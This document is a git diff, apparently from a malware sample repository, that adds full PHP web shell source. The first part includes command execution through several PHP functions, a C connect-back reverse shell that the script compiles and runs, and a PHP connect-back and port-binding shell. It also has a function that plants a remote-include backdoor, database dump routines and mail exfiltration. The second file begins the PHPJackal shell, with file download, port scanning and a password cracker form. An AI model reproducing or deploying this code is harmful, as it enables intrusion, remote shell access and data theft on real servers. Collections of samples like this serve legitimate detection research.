$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs); + } + } else if(isset($dbt)) { + $strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt; + if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile; + $strOutput .= "</td></tr><tr><td> "; + if(isset($dumpfile)) { + $strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile); + } else { + $strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt); + } + } else { + $strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn . + "</td></tr><tr><td>" . + display_tables($dbH, $dbu, $dbp, $dbn); + } + $strOutput .= "</pre></td></tr></table><br/>"; +} + +if(isset($Odbh)) { + $strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr>"; + eval("\$Gdbhost = \"\$$Odbh\";"); + eval("\$Gdbuser = \"\$$dbu\";"); + eval("\$Gdbpass = \"\$$dbp\";"); + eval("\$Gdbname = \"\$$dbn\";"); + $strOutput .= "<tr><td>"; + if(isset($dbt)) { + $Gdbtabl = $dbt; + $strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl . + "</td></tr><tr><td>" . + display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl); + } else { + $strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass . + "</td></tr><tr><td> " . + Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass); + } + $strOutput .= "</pre></td></tr></table><br/>"; +} + +if(isset($OdbH)) { + $strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr><tr><td>"; + if(isset($dbt)) { + $strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt . + "</td></tr><tr><td> " . + Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt); + } else { + $strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp . + "</td></tr><tr><td> " . + Odisplay_tables($OdbH, $dbu, $dbp); + } + $strOutput .= "</pre></td></tr></table><br/>"; +} + + +$strOutput .= "</font></td></tr></table>"; +$strOutputB64 = chunk_split(base64_encode($strOutput)); +echo "</div></div></div></div></div></div></div></div></div></div>\n"; +echo '<iframe width="100%" height="100%" style="border:0; position: absolute; left: 0px; top: 0px;" src="data:text/html;base64,' . $strOutputB64 .'">'; + +###################################################################### +# +# functions +# +###################################################################### +# make globals avail +function import_globals() +{ + global $HTTP_SERVER_VARS; + global $REMOTE_ADDR; + global $PHP_SELF; + global $REQUESTS; + global $SCRIPT_FILENAME; + global $QUERY_STRING; + global $SCRIPT_URI; + global $SERVER_NAME; + $_igr = ini_get('register_globals'); + if ($_igr == '' OR $_igr == 'Off' OR $_igr == 0) import_request_variables('GPC'); + if (phpversion() <= '4.1.0') { + $REQUESTS = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS); + } else { + $REQUESTS = $_REQUEST; + } + if($_SERVER['PHP_SELF']=="") { + $SERVER_NAME = $HTTP_SERVER_VARS['SERVER_NAME']; + $SCRIPT_URI = $HTTP_SERVER_VARS['SCRIPT_URI']; + $REMOTE_ADDR = $HTTP_SERVER_VARS['REMOTE_ADDR']; + $QUERY_STRING = $HTTP_SERVER_VARS['QUERY_STRING']; + $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF']; + $SCRIPT_FILENAME = $HTTP_SERVER_VARS['SCRIPT_FILENAME']; + } else { + $SERVER_NAME = $_SERVER['SERVER_NAME']; + $SCRIPT_URI = $_SERVER['SCRIPT_URI']; + $REMOTE_ADDR = $_SERVER['REMOTE_ADDR']; + $QUERY_STRING = $_SERVER['QUERY_STRING']; + $PHP_SELF = $_SERVER['PHP_SELF']; + $SCRIPT_FILENAME = $_SERVER['SCRIPT_FILENAME']; + } +} + +function dd($v) { + global $DebugArr; + $rv = "<blockquote>\n"; + $q="while(list(\$key,\$val) = each(\$$v)) {". + ' if(array_search($key, $DebugArr)) {'. + ' } else if((is_array($val)) && ($key!="GLOBALS")) {'. + ' echo "<b>$key</b>>><br/>";'. + ' @dd($v."[".$key."]");'. + ' } else if($key=="GLOBALS") {'. + ' } else echo "<b>$key</b>=>$val<br/>";'. + '};'; + eval($q); + echo "</blockquote>\n"; +} + +function ddb($v) { + echo "<blockquote>\n"; + $q="while(list(\$key,\$val) = each(\$$v)) {". + ' if((is_array($val)) && ($key!="GLOBALS")) {'. + ' echo "<b>$key</b>>><br/>";'. + ' @dd($v."[".$key."]");'. + ' } else if($key=="GLOBALS") {'. + ' } else echo "<b>$key</b>=>$val<br/>";'. + '};'; + eval($q); + echo "</blockquote>\n"; +} + +###################################################################### +# cmd shell functions +###################################################################### +# test what cmd is working +function test_cmd_shell(){ + if(strlen(Mexec("pwd", 5))>11) $var = 5; + elseif(strlen(Mexec("pwd", 4))>11) $var = 4; + elseif(strlen(Mexec("pwd", 3))>11) $var = 3; + elseif(strlen(Mexec("pwd", 2))>0) $var = 2; + elseif(strlen(Mexec("pwd", 1))>0) $var = 1; + else $var = 0; + return $var; +} +# function for executing cmds +function Mexec($Mcmd, $type) { + if($Mcmd != ""){ + $dspec = array( + 0 => array("pipe", "r"), + 1 => array("pipe", "w"), + 2 => array("pipe", "r") + ); + $output = ""; + switch($type) { + case 5: + $output .= "<pre>"; + $lastline = exec($Mcmd, $arrOutput); + foreach($arrOutput as $val) { + $output .= $val . "\n"; + } + $output .= "</pre>"; + break; + case 4: + $proc = proc_open($Mcmd, $dspec, $pipes); + if (is_resource($proc)) { + $output .= "<pre>"; + fclose($pipes[0]); + while(!feof($pipes[1])) { + $tmp = fgets($pipes[1], 1024); + $output .= $tmp; + } + $output .= "</pre>"; + } + break; + case 3; + $output .= "<pre>"; + $output .= `$Mcmd`; + $output .= "</pre>"; + break; + case 2; + print "<pre>\n"; + $output = system($Mcmd); + print "</pre>\n"; + break; + case 1; + print "<pre>\n"; + $output = passthru($Mcmd); + print "</pre>\n"; + break; + case 0; + default; + $output = "There are no execute functions available!"; + break; + } + return $output; + } +} +function drop_mime_mail($from,$to,$subject,$attach_source,$content_type,$attach_appear,$msg) { + $msgerror = ""; + if($msg == "") $msgerror = "please enter a message"; + elseif($subject == "") $msgerror = "please enter a subject"; + else { + $stlf = md5(uniqid(time())); + $attach = ""; + $fp = fopen($attach_source, "rb"); + if($fp) while(!feof($fp)) { $attach = $attach . fread($fp, 1024); } + $header = "From: $from\n"; + $header .= "MIME-Version: 1.0\n"; + $header .= "Content-Type: multipart/mixed; boundary=$stlf\n\n"; + $header .= "This is a multi-part message in MIME format\n"; + $header .= "--$stlf\n"; + $header .= "Content-Type: text/plain\n"; + $header .= "Content-Transfer-Encoding: 8bit\n\n"; + $header .= "$msg\n"; + $header .= "--$stlf\n"; + $header .= "Content-Type: $content_type; name=$attach_appear\n"; + $header .= "Content-Transfer-Encoding: base64\n"; + $header .= "Content-Disposition: attachment; filename=$attach_appear\n\n"; + $header .= chunk_split(base64_encode($attach)); + $header .= "\n"; + $header .= "--$stlf--"; + mail($to,$subject,"",$header); + $msgerror = "send done - show header: <br>\n<pre>$header</pre> "; + } + return $msgerror; +} + +###################################################################### +# system browsing +###################################################################### + +function make_switch($val){ + global $txt; + global $lang; + global $SCRIPT_NAME,$SREQ,$_REQUEST,$MyLoc,$_SERVER; + if(isset($_REQUEST[$val]) AND $_REQUEST[$val] == 1) { $test = 0; $col = "green"; $sw = $txt[$lang]['off']; } + else { $test = 1; $col = "black"; $sw = $txt[$lang]['on']; } + return " <font color=$col>$val</font> <a target=\"_parent\" href=\"".$MyLoc."?".$SREQ."&".$val."=".$test."\">[ ". $sw." ]</a> "; +} +function drop_syslog_warning($msg) { + global $syslog; +# if($syslog == 1) syslog(LOG_WARNING,$msg); +} + +###################################################################### +# file functions +###################################################################### +function copy_file($source,$dest) { + $dataout = ""; + if($source == "") $dataout .= "enter source<br>\n"; + if($dest != "") { + ini_set("user_agent","m0ins downloader"); + if(!copy($source, $dest)) $dataout . "failed to copy ...<br>\n"; + if(file_exists($dest)) $dataout .= highlight_file($dest, 1); + } else { + $dataout .= "enter destination"; + } +} +function edit_file($cont,$dest,$do) { + $dataout = ""; + global $magic_quotes_gpc; + if(file_exists($dest)) { + if($do == 1){ + $fh = fopen($dest, "w"); + if(!$fh) { + $dataout .= "unable to open <b>$dest</b>.\n"; + } else { +# $cont = str_replace("&gt;", ">", str_replace("&lt;", "<", $cont)); + if($magic_quotes_gpc == 1) $cont = stripslashes($cont); + $write = fwrite($fh, $cont); + fclose($fh); + } + } + $dataout .= highlight_file($dest, 1); + } else { + $dataout .= "unable to open <b>$dest</b>.\n"; + } + return $dataout; +} +function show_file($source) { + $dataout = ""; + if(file_exists($source)) { + $fh = fopen($source, "r"); + if(!$fh) { + $dataout .= "unable to open <b>$source</b>.\n"; + } else { + $read = fread($fh, filesize($source)); + fclose($fh); + if(!empty($read)) $read = str_replace(">", "&gt;", str_replace("<", "&lt;", $read)); + $dataout .= $read; + } + } else { + $dataout .= "unable to open <b>$source</b>.\n"; + } + return $dataout; +} +function snoopy($chdir){ + $tmpOut = ""; + global $is_file,$is_dir,$is_w_dir,$is_w_file; + $fh = opendir("$chdir"); + if($fh!="") { + while (false !== ($filename = readdir($fh)) ) { + $FN = $chdir."/".$filename; + if(@is_file($FN)) $is_file[] = $filename; + if(@is_dir($FN)) $is_dir[] = $filename; + if(@is_writable($FN) && @is_dir($filename)) $is_w_dir[] = $filename; + if(@is_writable($FN) && @is_file($filename)) $is_w_file[] = $filename; + } + $tmpOut .= "<table border=1 cellspacing=1 cellpadding=0><tr>"; + $tmpOut .= echo_files($is_file, "all files"); + $tmpOut .= echo_files($is_dir, "only dirs"); + $tmpOut .= echo_files($is_w_dir, "writable dirs"); + $tmpOut .= echo_files($is_w_file,"writable files"); + $tmpOut .= "</tr></table>"; + } else { + $tmpOut .= "Permission denied."; + } + closedir($fh); + return $tmpOut; +} + +function echo_files($arr,$txt){ + $tmpOutMF = ""; + global $chdir,$MyLoc,$SREQ; + $tmpOutMF .= "<td valign=top>"; + $tmpOutMF .= "<b><font size=2 face=arial>$txt</b> <br><br>"; + if(count($arr) > 0) { + foreach($arr as $key => $file) { + $FN = $chdir."/".$file; + $owner = fileowner($FN); + $perms = substr(sprintf("%o",fileperms($FN)),-3); + if(@is_writable($FN) && @is_dir($FN)) $tmpOutMF .= "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>"; + elseif(@is_writable($FN) && @is_file($FN)) $tmpOutMF .= "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a> </font><br>"; + elseif(@is_file($FN)) $tmpOutMF .= "<font color=green>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a></font><br>"; + elseif(@is_dir($FN)) $tmpOutMF .= "<font color=blue>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>"; + } + } + $tmpOutMF .= "</td>"; + return $tmpOutMF; +} +function print_globals($v) { + global $a; + echo "<blockquote>\n"; + $q= "while(list(\$key,\$val) = each($".$v. ") ) { ". + " echo \"<b>\$key</b>=>\$val.<br>\"; ". + " if(( is_array(\$val)) && (\$key != \"GLOBALS\")) {". + " @print_globals( \$v.\"[\".\$key.\"]\" );". + "}}"; + eval($q); + echo "</blockquote>\n"; +} +###################################################################### +# connect back shell function +###################################################################### + +function connect_back($tmp_dir, $compiler, $host, $port) { + $shell = "#include <stdio.h>\n" . + "#include <sys/socket.h>\n" . + "#include <netinet/in.h>\n" . + "#include <arpa/inet.h>\n" . + "#include <netdb.h>\n" . + "int main(int argc, char **argv) {\n" . + " char *host;\n" . + " int port = 80;\n" . + " int f;\n" . + " int l;\n" . + " int sock;\n" . + " struct in_addr ia;\n" . + " struct sockaddr_in sin, from;\n" . + " struct hostent *he;\n" . + " char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" . + " \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" . + " \"For More Reliable Shell.\\n\"\n" . + " \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" . + " \"For Not Getting Logged.\\n(;\\n\\n\";\n" . + " printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" . + " if (argc < 2 || argc > 3) {\n" . + " printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" . + " return 1;\n" . + " }\n" . + " printf(\"[*] Dumping Arguments\\n\");\n" . + " l = strlen(argv[1]);\n" . + " if (l <= 0) {\n" . + " printf(\"[-] Invalid Host Name\\n\");\n" . + " return 1;\n" . + " }\n" . + " if (!(host = (char *) malloc(l))) {\n" . + " printf(\"[-] Unable to Allocate Memory\\n\");\n" . + " return 1;\n" . + " }\n" . + " strncpy(host, argv[1], l);\n" . + " if (argc == 3) {\n" . + " port = atoi(argv[2]);\n" . + " if (port <= 0 || port > 65535) {\n" . + " printf(\"[-] Invalid Port Number\\n\");\n" . + " return 1;\n" . + " }\n" . + " }\n" . + " printf(\"[*] Resolving Host Name\\n\");\n" . + " he = gethostbyname(host);\n" . + " if (he) {\n" . + " memcpy(&ia.s_addr, he->h_addr, 4);\n" . + " } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" . + " printf(\"[-] Unable to Resolve: %s\\n\", host);\n" . + " return 1;\n" . + " }\n" . + " sin.sin_family = PF_INET;\n" . + " sin.sin_addr.s_addr = ia.s_addr;\n" . + " sin.sin_port = htons(port);\n" . + " printf(\"[*] Connecting...\\n\");\n" . + " if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" . + " printf(\"[-] Socket Error\\n\");\n" . + " return 1;\n" . + " }\n" . + " if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" . + " printf(\"[-] Unable to Connect\\n\");\n" . + " return 1;\n" . + " }\n" . + " printf(\"[*] Spawning Shell\\n\");\n" . + " f = fork( );\n" . + " if (f < 0) {\n" . + " printf(\"[-] Unable to Fork\\n\");\n" . + " return 1;\n" . + " } else if (!f) {\n" . + " write(sock, msg, sizeof(msg));\n" . + " dup2(sock, 0);\n" . + " dup2(sock, 1);\n" . + " dup2(sock, 2);\n" . + " execl(\"/bin/sh\", \"shell\", NULL);\n" . + " close(sock);\n" . + " return 0;\n" . + " }\n" . + " printf(\"[*] Detached\\n\\n\");\n" . + " return 0;\n" . + "}\n"; + $fbname = $tmp_dir . "/cbs"; + $fp = fopen($fbname . ".c", "w"); + $write = fwrite($fp, $shell); + fclose($fp); + if(!empty($write)) { + $command = $compiler . " -o " . $fbname . " " . $fbname . ".c"; + $execM = test_cmd_shell(); + if($execM > 0) { + $rtval = Mexec($command, $execM); + $command = $fbname . " " . $host . " " . $port; + $rtval .= Mexec($command, $execM); + return "<pre>" . $rtval . "</pre>"; + } else { + return "<b>ERROR! No EXEC Avilable!</b>"; + } + + } else { + return "<b>ERROR! Writing data!</b>"; + } +} + +###################################################################### +# drop mini inc hole +###################################################################### +function dropminiinc($location) { + $Scode = "<?php\n". + "if (phpversion() <= '4.1.0') \$vars = array_merge(\$HTTP_GET_VARS, \$HTTP_POST_VARS);\n". + "else \$vars = \$_REQUEST;\n". + "include(\$vars[inc]);\n". + "?>\n"; + $fp = fopen($location, "w"); + $write = fwrite($fp, $Scode); + if(!empty($write)) return "<b>$location</b> copied\n"; + else return "<b>ERROR! Not copied!</b>"; +} + +###################################################################### +# db functions +# unchanged from dans code +###################################################################### +function prep_rows($myresult) { + $dataout = "<table>\n"; + $num_fields = mysql_num_fields($myresult); + $dataout .= "<tr border=1>\n"; + for($i=0; $i<$num_fields; $i++) $dataout .= "<td>" . mysql_field_name($myresult, $i) . "</td>"; + $dataout .= "</tr>\n"; + while ($line = mysql_fetch_array($myresult, MYSQL_ASSOC)) { + $dataout .= "<tr>\n"; + foreach($line as $colvalue) { + $dataout .= "<td>$colvalue</td>\n"; + } + $dataout .= "</tr>\n"; + } + $dataout .= "</table>\n"; + return $dataout; +} + +function dump_rows($myhost, $myuser, $mypass, $mydb, $mytable, $mydump) { + $link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; + mysql_select_db($mydb); // or return "Could not select database"; + $query = "SELECT * FROM ".$mytable." INTO OUTFILE \"".$mydump."\";"; + $result = mysql_query($query); // or return "Query failed: ".mysql_error(); + mysql_free_result($result); + mysql_close($link); + return "Hopefully dumped!"; +} + +function dump_query($myhost, $myuser, $mypass, $mydb, $mysql, $mydump) { + $link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; + mysql_select_db($mydb); // or return "Could not select database"; + $query = $mysql." INTO OUTFILE \"".$mydump."\";"; + $result = mysql_query($query); // or return "Query failed: ".mysql_error(); + mysql_free_result($result); + mysql_close($link); + return "Hopefully dumped!"; +} + +function display_query($myhost, $myuser, $mypass, $mydb, $mysql) { + $link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; + mysql_select_db($mydb); // or return "Could not select database"; + $query = $mysql; + $result = mysql_query($query); // or return "Query failed: ".mysql_error(); + $dataouted = prep_rows($result); + mysql_free_result($result); + mysql_close($link); + return($dataouted); +} + +function display_rows($myhost, $myuser, $mypass, $mydb, $mytable) { + $link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; + mysql_select_db($mydb); // or return "Could not select database"; + $query = "SELECT * FROM ".$mytable; + $result = mysql_query($query); // or return "Query failed: ".mysql_error(); + $dataouted = prep_rows($result); + mysql_free_result($result); + mysql_close($link); + return($dataouted); +} + +function display_tables($myhost, $myuser, $mypass, $mydb) { + global $MyLoc,$SREQ; + $link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; + $result = mysql_list_tables($mydb); + if (!$result) { + return "DB Error, could not list tables"; + } + $dataout = "<table>\n"; + while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) { + $dataout .= "<tr>\n"; + foreach ($line as $col_value) { + $dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$mydb&incdbtable=$col_value'>$col_value</a></td>\n"; + } + $dataout .= "</tr>\n"; + } + $dataout .= "</table>\n"; + mysql_free_result($result); + mysql_close($link); + return($dataout); +} + +function display_dbs($myhost, $myuser, $mypass) { + global $MyLoc,$SREQ; + $link = mysql_connect($myhost, $myuser, $mypass); + $result = mysql_list_dbs($link); + if (!$result) { + return "DB Error, could not list databases"; + } + $dataout = "<table>\n"; + while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) { + $dataout .= "<tr>\n"; + foreach ($line as $col_value) { + $dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'>$col_value</a></td>\n"; + } + $dataout .= "</tr>\n"; + } + $dataout .= "</table>\n"; + mysql_free_result($result); + mysql_close($link); + return($dataout); +} + +function Odisplay_rows($myhost, $myuser, $mypass, $mydb, $mytable) { + $link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect"; + $query = "SELECT * FROM ".$mytable; + $result = odbc_exec($link, $query); // or return "Query failed: ".mysql_error(); + $dataout = "<table>\n"; + while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) { + $dataout = $dataout . "<tr>\n"; + foreach($line as $colvalue) { + $dataout = $dataout . "<td>$colvalue</td>\n"; + } + $dataout = $dataout . "</tr>\n"; + } + $dataout = $dataout . "</table>\n"; + return($dataout); +} + +function Odisplay_tables($myhost, $myuser, $mypass) { + $link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect"; + $result = odbc_tables($link); + if (!$result) { + return "DB Error, could not list tables"; + } + $dataout = "<table>\n"; + while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) { + if(odbc_result($line, 4) == "TABLE") { + $dataout = $dataout . "<tr>\n"; + $dataout = $dataout . "<td>" . odbc_result($tablelist, 3) ."</td>\n"; + } + $dataout = $dataout . "</tr>\n"; + } + $dataout = $dataout . "</table>\n"; + return($dataout); +} + +###################################################################### +# Dan's Network function Wrappers +# Initial use inside this script, need to handle the error data +# differently to get it included in the base 64 output! +###################################################################### + +function DB_NET_GET_SOCKET_PROTOCOL($prot) { + switch($prot) { + case "udp": + $protocol = SOL_UDP; + $socktype = SOCK_DGRAM; + break; + case "tcp": + default: + $protocol = SOL_TCP; + $socktype = SOCK_STREAM; + break; + } + return(array($protocol, $socktype)); +} + +function DB_NET_CONNECT($hostname, $port=80, $prot="tcp") { + $address = gethostbyname($hostname); + list($protocol, $socktype) = DB_NET_GET_SOCKET_PROTOCOL($prot); + switch($prot) { + case "udp": + $protocol = SOL_UDP; + $socktype = SOCK_DGRAM; + break; + case "tcp": + default: + $protocol = SOL_TCP; + $socktype = SOCK_STREAM; + break; + } + $socket = socket_create(AF_INET, $socktype, $protocol); + if ($socket < 0) { + echo "socket_create() failed: reason: " . socket_strerror($socket) . "\n"; + } + + $result = socket_connect($socket, $address, $port); + if ($result < 0) { + echo "socket_connect() failed.\nReason: ($result) " . socket_strerror($result) . "\n"; + } + return $socket; +} + +function DB_NET_LISTEN($address, $port) { + if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) { + echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n"; + return(-1); + } + + if (($ret = socket_bind($sock, $address, $port)) < 0) { + echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n"; + return(-2); + } + + if (($ret = socket_listen($sock, 5)) < 0) { + echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n"; + return(-3); + } + + return($sock); +} + +###################################################################### +# Dan's PHP Connect Back / Port Binding Shell! +# Yes that right a REAL shell! +# Now I had this idea for ages, finally coded it 6 months ago, and +# it's never really been used. +# Not really brain science but when there are many examples of PHP +# sockets + proc_open it's a little harder. +###################################################################### + +function DB_Shell($type, $shell, $port, $host = "0.0.0.0") { + if($type == "cb" && $host != "0.0.0.0") { + $procsock = DB_NET_CONNECT($host, $port, "tcp"); + } elseif ($type == "pb") { + $lsock = DB_NET_LISTEN($host, $port); + if (($procsock = socket_accept($lsock)) < 0) { + return "socket_accept() failed: reason: " . socket_strerror($procsock) . "\n"; + } + } else { + return "Error no connection details specified!"; + } + + set_time_limit(9000); + $descriptorspec = array( + 0 => array("pipe", "r"), + 1 => array("pipe", "w"), + 2 => array("pipe", "w") + ); + $process = proc_open($shell, $descriptorspec, $pipes); + if (is_resource($process)) { + $tmp_loop = 1; + do { + $tmp_array = array($procsock); + $num_changed_sockets = socket_select($tmp_array, $write = NULL, $except = NULL, 0); + if ($num_changed_sockets === false) { + $tmp_loop = 0; + } else if ($num_changed_sockets > 0) { + foreach($tmp_array as $k => $v) { + if($v == $procsock) { + if(socket_last_error($procsock) > 0) $tmp_loop = 0; + if($tmp_loop == 1 && false == ($buf = socket_read($procsock, 2048, PHP_NORMAL_READ))) $tmp_loop = 0; + fwrite($pipes[0], $buf); + } + } + } + $tmp_arrayS = array($pipes[1], $pipes[2]); + $num_changed_streams = stream_select($tmp_arrayS, $write = NULL, $except = NULL, 0); + if ($num_changed_streams === FALSE) { + $tmp_loop = 0; + } else if ($num_changed_streams > 0) { + foreach($tmp_arrayS as $k => $v) { + if($tmp_loop == 1 && false == ($buf = fread($v, 2048))) $tmp_loop = 0; + socket_write($procsock, $buf, strlen($buf)); + } + } + } while($tmp_loop == 1); + } else { + return "Error executing shell " . $shell; + } +} + +?> diff --git a/PHP/Backdoor.PHP.Agent.ba b/PHP/Backdoor.PHP.Agent.ba new file mode 100644 index 00000000..d495a42c --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.ba @@ -0,0 +1,1413 @@ +<?php +#--Config--# +$login_password= ''; //Set password +#----------# +error_reporting(E_ALL); +set_time_limit(0); +ini_set("max_execution_time","0"); +ini_set("memory_limit","9999M"); +set_magic_quotes_runtime(0); +if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS; +if(!isset($_POST))$_POST = &$HTTP_POST_VARS; +if(!isset($_GET))$_GET = &$HTTP_GET_VARS; +if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS; +$_REQUEST = array_merge($_GET, $_POST); +if (get_magic_quotes_gpc()){ +foreach ($_REQUEST as $key=>$value) +{ +$_REQUEST[$key]=stripslashes($value); +} +} +function hlinK($str=""){ +$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL'); +$ret=$_SERVER['PHP_SELF']."?"; +$new=explode("&",$str); +foreach ($_GET as $key => $v){ +$add=1; +foreach($new as $m){ +$el = explode("=", $m); +if ($el[0]==$key)$add=0; +} +if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&"; +} +$ret.=$str; +return $ret; +} +if(!empty($login_password)){ +if(!empty($_REQUEST['fpassw'])){ +if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw'])); +@header("Location: ".hlinK()); +} +if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></td></tr></form></table></body></html>"); +} +if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']); +function checkthisporT($ip,$port,$timeout,$type=0){ +if(!$type){ +$scan=@fsockopen($ip,$port,$n,$s,$timeout); +if($scan){fclose($scan);return 1;} +} +elseif(function_exists('socket_set_timeout')){ +$scan=@fsockopen("udp://".$ip,$port); +if($scan){ +socket_set_timeout($scan,$timeout); +@fwrite($scan,"\x00"); +$s=time(); +fread($scan,1); +if((time()-$s)>=$timeout){fclose($scan);return 1;} +} +} +return 0; +} +if (!function_exists("file_get_contents")){ +function file_get_contents($addr){ +$a = fopen($addr,"r"); +$tmp = fread($a,filesize($a)); +fclose($a); +if($a)return $tmp; +} +} +if (!function_exists("file_put_contents")){ +function file_put_contents($addr,$con){ +$a = fopen($addr,"w"); +if(!$a)return 0; +fwrite($a,$con); +fclose($a); +return strlen($con); +} +} +function flusheR(){ +flush();@ob_flush(); +} +if (!empty($_REQUEST['downloaD'])){ +@ob_clean(); +$dl=$_REQUEST['downloaD']; +$con=file_get_contents($dl); +header("Content-type: application/octet-stream"); +header("Content-disposition: attachment; filename=\"$dl\";"); +header("Content-length: ".strlen($con)); +echo $con; +exit; +} +if (!empty($_REQUEST['imagE'])){ +$img=$_REQUEST['imagE']; +header("Content-type: imagE/gif"); +header("Content-length: ".filesize($img)); +header("Last-Modified: ".date("r",filemtime($img))); +echo file_get_contents($img); +exit; +} +@header("Cache-Control: no-cache, must-revalidate"); +@header("Expires: Mon, 7 Aug 1987 05:00:00 GMT"); +function showsizE($size){ +if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; +elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; +elseif ($size>=1024)$size = round(($size/1024),2)." KB"; +else $size .= " B"; +return $size; +} +if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0; +$errorbox = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td><b>Error: </b>"; +$et = "</td></tr></table>"; +$v="1.5"; +$msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td align=\"center\">"; +$intro="<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\"><tr><td bgcolor=\"#666666\"><b>Script:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href=\"http://netjackal.by.ru\" target=\"_blank\">http://netjackal.by.ru</a><br><b>Email:</b> <a href=\"mailto:nima_501@yahoo.com?subject=PHPJackal\">nima_501@yahoo.com</a><br></font>$et</center>"; +$footer="${msgbox}PHPJackal v$v - Powered By <a href=\"http://netjackal.by.ru\" target=\"_blank\">NetJackal</a>$et"; +$hcwd="<input type=hidden name=workingdiR value=\"".getcwd()."\">"; +$t = "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">"; +$crack="</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; +function namE(){ +$name=''; +srand((double)microtime()*100000); +for ($i=0;$i<=rand(3,10);$i++){ +$name.=chr(rand(97,122)); +} +return $name; +} +function whereistmP(){ 